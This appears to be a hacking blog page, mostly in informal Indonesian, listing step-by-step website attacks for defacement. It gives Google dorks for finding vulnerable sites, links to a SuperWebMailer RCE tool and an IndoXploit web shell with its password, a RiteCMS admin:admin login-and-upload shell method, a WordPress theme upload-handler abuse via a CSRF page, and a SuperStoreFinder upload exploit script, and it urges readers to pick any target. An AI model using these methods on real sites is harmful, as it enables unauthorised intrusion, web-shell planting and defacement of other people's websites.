Laravel RCE via Web Apps
download tools
kemudian jalankan toolsnya
Laravel RCE via Web Apps
Unauthentication RCE SuperWebMailer
Dork :
inurl:/swm/defaultnewsletter.php
Tools :
https://github.com/Aryaalfahrezi010/RCE_SuperWebMailer
Shell:
https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php Pass IndoXploit
Oke pertama kita dorking dulu seperti biasa
Pilih web yg lo mau terserah
Nah Habis Itu lu hapus bagian defaultnewsletter.php
jadi (https://sitelu.com/swm)
habis itu lu install tools nya gblk
pakek python3 ya itu jangan lupa
python3 exploit.py -u https://sitelu/swm/
Nanti kalo vuln ada tulisannya kyak dibwh ini
RiteCMS 2.2.1 - Authenticated Remote Code Execution
Vendor Homepage: http://ritecms.com/
Version: 2.2.1
Dork:
intext:"Powered By RiteCMS"
1- Go to following url. >> http://(HOST)/cms/
2- Default username and password is admin:admin. We must know login credentials.
3- Go "Filemanager" and press "Upload file" button.
4- Choose your php webshell script and upload it.
shell access?http://target.com/media/yourshell.php
Ref? Rite Cms
Contact : ncdream72@gmail.com
Deface Poc Computer Based Test RCE
Deface WordPress Orange Themes
Dork :
- inurl:/wp-content/themes/kernel-theme
- inurl:/wp-content/themes/bordeaux-theme
- inurl:/wp-content/themes/bulteno-theme
- inurl:/wp-content/themes/rayoflight-theme
Exploit :
/functions/upload-handler.php
Crsf Online :
https://blogpongo.com/csrf.php
Kalian Dorking Dulu di google
Pilih Salah Satu Web/Target Tambahin Exploitnya
Vuln?= Ada bacaan Error
Lalu Kalian Bukan Csrfnya
Masukkan Url
Contoh :
https://sitetarget.com/wp-content/themes/kernel-theme/functions/upload-handler.php
Post File : orange_themes
Kemudian Klik Submit Nah Terus Upload Shell/Sc Lu Kalo Sukses Nanti Keluar Nama File Kalian
Location File?:/wp-content/uploads/[tahun]/[bulan]/file lu
contoh :
https://sitetarget.com/wp-content/uploads/2020/02/sht.html
contact : ncdream72@gmail.com
SuperStoreFinder Wordpress Plugins Arbitrary File Upload
Dork:
- SuperStoreFinder
- Inurl:superstorefinder-wp
- Inurl:superlogoshowcase-wp
SuperStoreFinder Exploit Upload Shell
https://pastebin.com/raw/pMuFWLLm
Usage:python filename.py http://google.com
Ref:
https://packetstormsecurity.com/files/159627/
still don't get it?
Contact : ncdream72@gmail.com